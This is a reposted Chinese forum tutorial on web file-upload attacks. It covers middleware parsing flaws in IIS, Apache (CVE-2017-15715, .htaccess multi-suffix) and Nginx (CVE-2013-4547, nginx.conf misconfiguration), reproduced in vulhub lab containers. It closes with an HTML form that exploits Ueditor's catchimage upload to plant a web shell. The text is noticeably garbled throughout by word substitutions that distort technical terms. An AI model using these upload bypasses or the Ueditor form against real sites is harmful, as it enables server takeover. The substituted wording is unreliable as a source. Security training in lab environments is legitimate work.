论坛 › 网络安全 › day33WEB 攻防-通用弊端&文件上传&中间件解析弊端&编辑器安全

南飓风 发表于 2024-6-19 08:41:20

day33WEB 攻防-通用弊端&文件上传&中间件解析弊端&编辑器安全

目次
一，中间件文件解析弊端-IIS&Apache&Nginx
-IIS 6 7 文件名 目次名
-Apache 换行解析 配置不当
1、换行解析-CVE-2017-15715
2、配置不当-.htaccess 配置不当
-Nginx 文件名逻辑 解析弊端
1、文件名逻辑-CVE-2013-4547
2、解析弊端-nginx.conf 配置不当
二，Web 应用编辑器-Ueditor 文件上传安全
三，实例 CMS&平台-中间件解析&编辑器引用
 配套资源下载（百度网盘）：
链接：https://pan.baidu.com/s/11Q9sAPQ9P_ReOP9PKL0ABg?pwd=jgg4 
提取码：jgg4   本章节知识点：    1、中间件安全问题   2、中间件文件上传解析   3、Web   应用编辑器上传      前置知识：    后门代码需要用特定格式后缀解析，不能以图片后缀解析脚本后门代码(解析弊端除外)   如：jpg   图片里面有   php   后门代码，不能被触发，所以连接不上后门   如果要图片后缀解析脚本代码，一样平常会利用包罗弊端或解析弊端，还   有.user.ini&.htaccess   文件上传弊端测试思绪和步调   1，看中间件是什么，有没有报出过弊端    2，看文件上传是引用外部的编辑器照旧步伐员自己编写，如果是引用外部的编辑器就看是什么编辑器，然后查看此编辑器有没有爆出过弊端，是否可以利用    3，如果是步伐员自己编写，那就根据代码逻辑黑盒测试   一，中间件文件解析弊端-IIS&Apache&Nginx

-IIS 6 7 文件名 目次名

   1   、文件名：   x.asp;.x.jpg      2   、目次名：   x.asp/x.jpg      3   、   IIS7.X    与    Nginx    解析弊端同等          弊端利用条件：       1，是这中间件       2，上传文件能不能修改上传目次大概上传的文件名能增加命名       如果上传的文件名固定大概目次也无法修改，那么这个解析弊端就无用武之地      -Apache 换行解析 配置不当

1、换行解析-CVE-2017-15715

 弊端环境：https://vulhub.org/#/environments/httpd/CVE-2017-15715/
   其    2.4.0~2.4.29    版本中存在一个解析弊端          弊端利用条件：       1，是这个中间件       2，黑名单验证（在黑名单的后缀不让上传php jsp等），就可以通过php%0a绕过黑名单，但是需要包管这个后缀是能够正常解析的脚本代码。如果是白名单大概不行（在白名单里面才可以上传jpj，png，gif 等），但是如果没有考虑以最后一个点为后缀，通过1.jpj.php%0a的形式也大概能够绕过。         弊端复现         启动靶场       xiaodi@ubuntu:~/vulhub-master/httpd/CVE-2017-15715$ sudo docker-compose build
xiaodi@ubuntu:~/vulhub-master/httpd/CVE-2017-15715$ sudo docker-compose up -d
       https://img-blog.csdnimg.cn/direct/37cd21fe3d9e4b90b2224aea05b51fd0.png         上传一个名为1.php的文件，被拦截：       https://img-blog.csdnimg.cn/direct/4fe76386721b48efa64103c2930e5ada.png         在1.php背面插入一个   \x0A（留意，不能是   \x0D\x0A，只能是一个   \x0A），不再拦截：       https://img-blog.csdnimg.cn/direct/26c6daebafd7486f9d0bdedf88380881.png         访问刚才上传的   /1.php%0a，发现能够成功解析，但这个文件不是php后缀，说明目标存在解析弊端：       https://img-blog.csdnimg.cn/direct/217b7cf016ba4c4a8fcc15c7553e107e.png         关闭靶场       xiaodi@ubuntu:~/vulhub-master/httpd/CVE-2017-15715$ sudo docker-compose down   2、配置不当-.htaccess 配置不当

    弊端环境：https://vulhub.org/#/environments/httpd/apache_parsing_vulnerability/
   AddHandler application/x-httpd-php .php
       在有多个后缀的环境下，只要一个文件含有   .php后缀的文件即将被辨认成PHP文件，没必要是最后一个后缀。利用这个特性，将会造成一个可以绕过上传白名单的解析弊端。         弊端利用条件：       1，是这个中间件       2，文件名需要基于当地命名为准（就是文件上传后文件名不会被修改）         弊端复现         启动靶场       xiaodi@ubuntu:~/vulhub-master/httpd/apache_parsing_vulnerability$ sudo docker-compose build
xiaodi@ubuntu:~/vulhub-master/httpd/apache_parsing_vulnerability$ sudo docker-compose up -d
   https://img-blog.csdnimg.cn/direct/db77d8aaaa7643498594851f485f14ee.png
   环境运行后，访问http://your-ip/uploadfiles/apache.php.jpeg即可发现，phpinfo被实验了，该文件被解析为php脚本。
   https://img-blog.csdnimg.cn/direct/9809b50fae4a49f4bcf9b7fc8448c6a6.png
   http://your-ip/index.php中是一个白名单查抄文件后缀的上传组件，上传完成后并未重命名。我们可以通过上传文件名为xxx.php.jpg或xxx.php.jpeg的文件，利用Apache解析弊端举行getshell。
   https://img-blog.csdnimg.cn/direct/7379b4ba1ae74224bdd597b4f1a454bc.png
   https://img-blog.csdnimg.cn/direct/59505de7be3a4006978e65cc66e14096.png
   关闭靶场
   xiaodi@ubuntu:~/vulhub-master/httpd/apache_parsing_vulnerability$ sudo docker-compose down
   
    -Nginx 文件名逻辑 解析弊端

       弊端利用条件:符号中间件即可测试      1、文件名逻辑-CVE-2013-4547

   影响版本：   Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7          弊端环境：https://vulhub.org/#/environments/nginx/CVE-2013-4547/         弊端复现         启动弊端       xiaodi@ubuntu:~/vulhub-master/nginx/CVE-2013-4547$ sudo docker-compose build
xiaodi@ubuntu:~/vulhub-master/nginx/CVE-2013-4547$ sudo docker-compose up -d   https://img-blog.csdnimg.cn/direct/4d5601c442954db9ba51d39e3f21a8ca.png
   
   这个环境是黑名单验证，我们无法上传php后缀的文件，需要利用CVE-2013-4547。我们上传一个“1.gif ”，留意背面的空格：
   https://img-blog.csdnimg.cn/direct/8bc237d4bb59483fa363be116205d619.png
       访问   http://your-ip:8080/uploadfiles/1.gif.php，即可发现PHP已被解析：       https://img-blog.csdnimg.cn/direct/c76b10f8ca9941e58fe93065606ed523.png         关闭弊端       xiaodi@ubuntu:~/vulhub-master/nginx/CVE-2013-4547$ sudo docker-compose down   
    2、解析弊端-nginx.conf 配置不当

   弊端环境：https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/       由此可知，该弊端与    Nginx   、   php    版本无关，属于用户配置不当造成的解析弊端。          弊端复现         启动弊端       xiaodi@ubuntu:~/vulhub-master/nginx/nginx_parsing_vulnerability$ sudo docker-compose up -d   访问http://your-ip/uploadfiles/nginx.png
   https://img-blog.csdnimg.cn/direct/80d64e379be84f95901350800d98fe28.png
   访问http://your-ip/uploadfiles/nginx.png/.php
   https://img-blog.csdnimg.cn/direct/36213a38360f4f80bc0a538942622565.png
   
   关闭弊端
   xiaodi@ubuntu:~/vulhub-master/nginx/nginx_parsing_vulnerability$ sudo docker-compose down   
    二，Web 应用编辑器-Ueditor 文件上传安全

https://img-blog.csdnimg.cn/direct/efa289b6d218461e904755895292b263.png
利用代码：
<form
action="http://192.168.46.139/net/controller.ashx?action=catchima
ge" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

查看完整版本: day33WEB 攻防-通用弊端&文件上传&中间件解析弊端&编辑器安全